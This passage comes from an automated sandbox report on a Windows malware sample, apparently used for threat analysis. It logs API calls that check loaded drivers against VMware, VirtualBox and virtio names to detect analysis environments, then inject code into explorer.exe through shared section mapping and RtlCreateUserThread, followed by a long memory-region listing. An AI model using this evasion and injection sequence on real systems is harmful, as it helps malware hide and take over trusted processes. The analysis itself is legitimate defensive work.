_SubStr="vioser") returned 0x0 [0130.025] strstr (_Str="wdf01000.sys", _SubStr="vmci.s") returned 0x0 [0130.025] strstr (_Str="wdf01000.sys", _SubStr="vmusbm") returned 0x0 [0130.025] strstr (_Str="wdf01000.sys", _SubStr="vmmous") returned 0x0 [0130.025] strstr (_Str="wdf01000.sys", _SubStr="vm3dmp") returned 0x0 [0130.025] strstr (_Str="wdf01000.sys", _SubStr="vmrawd") returned 0x0 [0130.025] strstr (_Str="wdf01000.sys", _SubStr="vmmemc") returned 0x0 [0130.025] strstr (_Str="wdf01000.sys", _SubStr="vboxgu") returned 0x0 [0130.025] strstr (_Str="wdf01000.sys", _SubStr="vboxsf") returned 0x0 [0130.025] strstr (_Str="wdf01000.sys", _SubStr="vboxmo") returned 0x0 [0130.025] strstr (_Str="wdf01000.sys", _SubStr="vboxvi") returned 0x0 [0130.025] strstr (_Str="wdf01000.sys", _SubStr="vboxdi") returned 0x0 [0130.025] strstr (_Str="wdf01000.sys", _SubStr="vioser") returned 0x0 [0130.026] strstr (_Str="wdfldr.sys", _SubStr="vmci.s") returned 0x0 [0130.026] strstr (_Str="wdfldr.sys", _SubStr="vmusbm") returned 0x0 [0130.026] strstr (_Str="wdfldr.sys", _SubStr="vmmous") returned 0x0 [0130.026] strstr (_Str="wdfldr.sys", _SubStr="vm3dmp") returned 0x0 [0130.026] strstr (_Str="wdfldr.sys", _SubStr="vmrawd") returned 0x0 [0130.026] strstr (_Str="wdfldr.sys", _SubStr="vmmemc") returned 0x0 [0130.026] strstr (_Str="wdfldr.sys", _SubStr="vboxgu") returned 0x0 [0130.026] strstr (_Str="wdfldr.sys", _SubStr="vboxsf") returned 0x0 [0130.026] strstr (_Str="wdfldr.sys", _SubStr="vboxmo") returned 0x0 [0130.026] strstr (_Str="wdfldr.sys", _SubStr="vboxvi") returned 0x0 [0130.026] strstr (_Str="wdfldr.sys", _SubStr="vboxdi") returned 0x0 [0130.026] strstr (_Str="wdfldr.sys", _SubStr="vioser") returned 0x0 [0130.026] strstr (_Str="acpiex.sys", _SubStr="vmci.s") returned 0x0 [0130.026] strstr (_Str="acpiex.sys", _SubStr="vmusbm") returned 0x0 [0130.026] strstr (_Str="acpiex.sys", _SubStr="vmmous") returned 0x0 [0130.026] strstr (_Str="acpiex.sys", _SubStr="vm3dmp") returned 0x0 [0130.026] strstr (_Str="acpiex.sys", _SubStr="vmrawd") returned 0x0 [0130.026] strstr (_Str="acpiex.sys", _SubStr="vmmemc") returned 0x0 [0130.026] strstr (_Str="acpiex.sys", _SubStr="vboxgu") returned 0x0 [0130.026] strstr (_Str="acpiex.sys", _SubStr="vboxsf") returned 0x0 [0130.026] strstr (_Str="acpiex.sys", _SubStr="vboxmo") returned 0x0 [0130.026] strstr (_Str="acpiex.sys", _SubStr="vboxvi") returned 0x0 [0130.026] strstr (_Str="acpiex.sys", _SubStr="vboxdi") returned 0x0 [0130.027] strstr (_Str="acpiex.sys", _SubStr="vioser") returned 0x0 [0130.027] strstr (_Str="wpprecorder.sys", _SubStr="vmci.s") returned 0x0 [0130.027] strstr (_Str="wpprecorder.sys", _SubStr="vmusbm") returned 0x0 [0130.027] strstr (_Str="wpprecorder.sys", _SubStr="vmmous") returned 0x0 [0130.027] strstr (_Str="wpprecorder.sys", _SubStr="vm3dmp") returned 0x0 [0130.027] strstr (_Str="wpprecorder.sys", _SubStr="vmrawd") returned 0x0 [0130.027] strstr (_Str="wpprecorder.sys", _SubStr="vmmemc") returned 0x0 [0130.027] strstr (_Str="wpprecorder.sys", _SubStr="vboxgu") returned 0x0 [0130.027] strstr (_Str="wpprecorder.sys", _SubStr="vboxsf") returned 0x0 [0130.027] strstr (_Str="wpprecorder.sys", _SubStr="vboxmo") returned 0x0 [0130.027] strstr (_Str="wpprecorder.sys", _SubStr="vboxvi") returned 0x0 [0130.027] strstr (_Str="wpprecorder.sys", _SubStr="vboxdi") returned 0x0 [0130.027] strstr (_Str="wpprecorder.sys", _SubStr="vioser") returned 0x0 [0130.028] strstr (_Str="cng.sys", _SubStr="vmci.s") returned 0x0 [0130.028] strstr (_Str="cng.sys", _SubStr="vmusbm") returned 0x0 [0130.028] strstr (_Str="cng.sys", _SubStr="vmmous") returned 0x0 [0130.028] strstr (_Str="cng.sys", _SubStr="vm3dmp") returned 0x0 [0130.028] strstr (_Str="cng.sys", _SubStr="vmrawd") returned 0x0 [0130.028] strstr (_Str="cng.sys", _SubStr="vmmemc") returned 0x0 [0130.028] strstr (_Str="cng.sys", _SubStr="vboxgu") returned 0x0 [0130.028] strstr (_Str="cng.sys", _SubStr="vboxsf") returned 0x0 [0130.028] strstr (_Str="cng.sys", _SubStr="vboxmo") returned 0x0 [0130.028] LocalFree (hMem=0x1da2050) returned 0x0 [0130.028] Sleep (dwMilliseconds=0x1388) [0135.057] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ff1c*=0x0, ZeroBits=0x0, RegionSize=0x19ff24*=0x5200, AllocationType=0x3000, Protect=0x4 | out: BaseAddress=0x19ff1c*=0x1d0000, RegionSize=0x19ff24*=0x6000) returned 0x0 [0135.059] GetShellWindow () returned 0x100d0 [0135.059] GetWindowThreadProcessId (in: hWnd=0x100d0, lpdwProcessId=0x19fec8 | out: lpdwProcessId=0x19fec8) returned 0x644 [0135.060] NtOpenProcess (in: ProcessHandle=0x19ff18, DesiredAccess=0x40, ObjectAttributes=0x19ff00*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0x19fef8*(UniqueProcess=0x640, UniqueThread=0x0) | out: ProcessHandle=0x19ff18*=0x15c) returned 0x0 [0135.060] NtDuplicateObject (in: SourceProcessHandle=0x15c, SourceHandle=0xffffffff, TargetProcessHandle=0xffffffff, TargetHandle=0x19ff1c, DesiredAccess=0x0, HandleAttributes=0x0, Options=0x2 | out: TargetHandle=0x19ff1c*=0x160) returned 0x0 [0135.060] NtCreateSection (in: SectionHandle=0x19fed4, DesiredAccess=0x6, ObjectAttributes=0x0, MaximumSize=0x19fed8, SectionPageProtection=0x4, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x19fed4*=0x164) returned 0x0 [0135.060] NtMapViewOfSection (in: SectionHandle=0x164, ProcessHandle=0xffffffff, BaseAddress=0x19fee4*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19fef0*=0x5000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0x19fee4*=0x1e0000, SectionOffset=0x0, ViewSize=0x19fef0*=0x5000) returned 0x0 [0135.061] NtMapViewOfSection (in: SectionHandle=0x164, ProcessHandle=0x160, BaseAddress=0x19feec*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19fef0*=0x5000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0x19feec*=0x2830000, SectionOffset=0x0, ViewSize=0x19fef0*=0x5000) returned 0x0 [0142.239] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1e0000, nSize=0x104 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\d836a03e0b7eeabbc971de7d3e6fcc11bf06e13e633d11118c7429b3abb3c4ed.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\d836a03e0b7eeabbc971de7d3e6fcc11bf06e13e633d11118c7429b3abb3c4ed.exe")) returned 0x62 [0142.239] NtCreateSection (in: SectionHandle=0x19fed0, DesiredAccess=0xe, ObjectAttributes=0x0, MaximumSize=0x19fed8, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x19fed0*=0x168) returned 0x0 [0142.240] NtMapViewOfSection (in: SectionHandle=0x168, ProcessHandle=0xffffffff, BaseAddress=0x19fee0*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19fef0*=0x15200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0x19fee0*=0x1d40000, SectionOffset=0x0, ViewSize=0x19fef0*=0x16000) returned 0x0 [0142.240] NtMapViewOfSection (in: SectionHandle=0x168, ProcessHandle=0x160, BaseAddress=0x19fee8*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19fef0*=0x16000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x20 | out: BaseAddress=0x19fee8*=0x2840000, SectionOffset=0x0, ViewSize=0x19fef0*=0x16000) returned 0x0 [0142.248] RtlCreateUserThread (in: ProcessHandle=0x160, SecurityDescriptor=0x0, CreateSuspended=0, StackZeroBits=0x0, StackReserve=0x0, StackCommit=0x0, StartAddress=0x2841920, Parameter=0x2830000, ThreadHandle=0x19fe30*=0xc401da2048, ClientId=0x0 | out: ThreadHandle=0x19fe30*=0x16c, ClientId=0x0) returned 0x0 [0142.250] NtTerminateProcess (ProcessHandle=0xffffffff, ExitStatus=0x0) Thread: id = 4 os_tid = 0x87c Process: id = "3" image_name = "explorer.exe" filename = "c:\\windows\\explorer.exe" page_root = "0x1789f000" os_pid = "0x640" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "2" os_parent_pid = "0xffffffffffffffff" cmd_line = "C:\\Windows\\Explorer.EXE" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f142" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 383 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 384 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 385 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 386 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 387 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 388 start_va = 0xe0000 end_va = 0xe1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 389 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 390 start_va = 0x100000 end_va = 0x1bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 391 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 392 start_va = 0x1d0000 end_va = 0x1d1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 393 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 394 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 395 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 396 start_va = 0x400000 end_va = 0x400fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 397 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 398 start_va = 0x420000 end_va = 0x51ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 399 start_va = 0x520000 end_va = 0x521fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 400 start_va = 0x530000 end_va = 0x531fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 401 start_va = 0x540000 end_va = 0x541fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 402 start_va = 0x550000 end_va = 0x551fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 403 start_va = 0x560000 end_va = 0x560fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_48.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_48.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_48.db") Region: id = 404 start_va = 0x570000 end_va = 0x570fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 405 start_va = 0x580000 end_va = 0x581fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 406 start_va = 0x590000 end_va = 0x593fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 407 start_va = 0x5a0000 end_va = 0x727fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 408 start_va = 0x730000 end_va = 0x730fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000730000" filename = "" Region: id = 409 start_va = 0x740000 end_va = 0x740fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000740000" filename = "" Region: id = 410 start_va = 0x750000 end_va = 0x750fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000750000" filename = "" Region: id = 411 start_va = 0x760000 end_va = 0x76ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000760000" filename = "" Region: id = 412 start_va = 0x770000 end_va = 0x8f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000770000" filename = "" Region: id = 413 start_va = 0x900000 end_va = 0x1cfffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000900000" filename = "" Region: id = 414 start_va = 0x1d00000 end_va = 0x20fafff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001d00000" filename = "" Region: id = 415 start_va = 0x2100000 end_va = 0x2103fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 416 start_va = 0x2110000 end_va = 0x2122fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000a.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000a.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000a.db") Region: id = 417 start_va = 0x2130000 end_va = 0x2130fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002130000" filename = "" Region: id = 418 start_va = 0x2140000 end_va = 0x214ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002140000" filename = "" Region: id = 419 start_va = 0x2150000 end_va = 0x2486fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 420 start_va = 0x2490000 end_va = 0x24a8fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{3da71d5a-20cc-432f-a115-dfe92379e91f}.1.ver0x000000000000000c.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.1.ver0x000000000000000c.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\{3da71d5a-20cc-432f-a115-dfe92379e91f}.1.ver0x000000000000000c.db") Region: id = 421 start_va = 0x24b0000 end_va = 0x24b1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000024b0000" filename = "" Region: id = 422 start_va = 0x24c0000 end_va = 0x24c1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000024c0000" filename = "" Region: id = 423 start_va = 0x24d0000 end_va = 0x24fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000024d0000" filename = "" Region: id = 424 start_va = 0x2500000 end_va = 0x2501fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002500000" filename = "" Region: id = 425 start_va = 0x2510000 end_va = 0x258ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002510000" filename = "" Region: id = 426 start_va = 0x2590000 end_va = 0x260ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002590000" filename = "" Region: id = 427 start_va = 0x2610000 end_va = 0x268ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002610000" filename = "" Region: id = 428 start_va = 0x2690000 end_va = 0x2691fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 429 start_va = 0x26a0000 end_va = 0x26adfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026a0000" filename = "" Region: id = 430 start_va = 0x26b0000 end_va = 0x26b1fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_idx.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_idx.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_idx.db") Region: id = 431 start_va = 0x26c0000 end_va = 0x26c0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_48.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_48.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_48.db") Region: id = 432 start_va = 0x26d0000 end_va = 0x26e7fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{3da71d5a-20cc-432f-a115-dfe92379e91f}.1.ver0x000000000000000d.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.1.ver0x000000000000000d.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\{3da71d5a-20cc-432f-a115-dfe92379e91f}.1.ver0x000000000000000d.db") Region: id = 433 start_va = 0x26f0000 end_va = 0x26fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026f0000" filename = "" Region: id = 434 start_va = 0x2700000 end_va = 0x2700fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{e23b5da4-e3a9-461b-8050-8e471867b572}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{E23B5DA4-E3A9-461B-8050-8E471867B572}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{e23b5da4-e3a9-461b-8050-8e471867b572}.2.ver0x0000000000000001.db") Region: id = 435 start_va = 0x2710000 end_va = 0x27effff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 436 start_va = 0x27f0000 end_va = 0x27f7fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windows.storage.dll.mui" filename = "\\Windows\\System32\\en-US\\windows.storage.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\windows.storage.dll.mui") Region: id = 437 start_va = 0x2800000 end_va = 0x2801fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002800000" filename = "" Region: id = 438 start_va = 0x2810000 end_va = 0x2810fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "counters.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\INetCache\\counters.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\inetcache\\counters.dat") Region: id = 439 start_va = 0x2820000 end_va = 0x2821fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_idx.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_idx.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_idx.db") Region: id = 440 start_va = 0x2860000 end_va = 0x2863fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 441 start_va = 0x2870000 end_va = 0x2871fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 442 start_va = 0x2890000 end_va = 0x2891fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002890000" filename = "" Region: id = 443 start_va = 0x28a0000 end_va = 0x28a0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{5c9e180f-34bb-4f92-8676-68c88e410c2b}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{5C9E180F-34BB-4F92-8676-68C88E410C2B}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{5c9e180f-34bb-4f92-8676-68c88e410c2b}.2.ver0x0000000000000001.db") Region: id = 444 start_va = 0x28b0000 end_va = 0x28b1fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 445 start_va = 0x28d0000 end_va = 0x28d3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 446 start_va = 0x28e0000 end_va = 0x28effff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000028e0000" filename = "" Region: id = 447 start_va = 0x28f0000 end_va = 0x296ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000028f0000" filename = "" Region: id = 448 start_va = 0x2970000 end_va = 0x2971fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002970000" filename = "" Region: id = 449 start_va = 0x2980000 end_va = 0x2981fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "oleaccrc.dll" filename = "\\Windows\\System32\\oleaccrc.dll" (normalized: "c:\\windows\\system32\\oleaccrc.dll") Region: id = 450 start_va = 0x2990000 end_va = 0x2a4bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 451 start_va = 0x2a50000 end_va = 0x2a53fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002a50000" filename = "" Region: id = 452 start_va = 0x2a60000 end_va = 0x2b5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a60000" filename = "" Region: id = 453 start_va = 0x2b60000 end_va = 0x2b66fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002b60000" filename = "" Region: id = 454 start_va = 0x2b70000 end_va = 0x2b71fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002b70000" filename = "" Region: id = 455 start_va = 0x2b80000 end_va = 0x3bbffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "staticcache.dat" filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat") Region: id = 456 start_va = 0x3bc0000 end_va = 0x3bc0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003bc0000" filename = "" Region: id = 457 start_va = 0x3bd0000 end_va = 0x3bd0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003bd0000" filename = "" Region: id = 458 start_va = 0x3be0000 end_va = 0x3be0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003be0000" filename = "" Region: id = 459 start_va = 0x3bf0000 end_va = 0x3bf1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003bf0000" filename = "" Region: id = 460 start_va = 0x3c00000 end_va = 0x3c7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003c00000" filename = "" Region: id = 461 start_va = 0x3c80000 end_va = 0x3c81fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003c80000" filename = "" Region: id = 462 start_va = 0x3c90000 end_va = 0x3c90fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003c90000" filename = "" Region: id = 463 start_va = 0x3ca0000 end_va = 0x3ca0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ca0000" filename = "" Region: id = 464 start_va = 0x3cb0000 end_va = 0x3cb0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cb0000" filename = "" Region: id = 465 start_va = 0x3cc0000 end_va = 0x3dbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cc0000" filename = "" Region: id = 466 start_va = 0x3dc0000 end_va = 0x3dc0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003dc0000" filename = "" Region: id = 467 start_va = 0x3dd0000 end_va = 0x3ddffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003dd0000" filename = "" Region: id = 468 start_va = 0x3de0000 end_va = 0x3deffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003de0000" filename = "" Region: id = 469 start_va = 0x3df0000 end_va = 0x3dfffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003df0000" filename = "" Region: id = 470 start_va = 0x3e00000 end_va = 0x3e00fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e00000" filename = "" Region: id = 471 start_va = 0x3e10000 end_va = 0x3e10fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e10000" filename = "" Region: id = 472 start_va = 0x3e20000 end_va = 0x3e20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e20000" filename = "" Region: id = 473 start_va = 0x3e30000 end_va = 0x3e33fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 474 start_va = 0x3e40000 end_va = 0x3e40fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e40000" filename = "" Region: id = 475 start_va 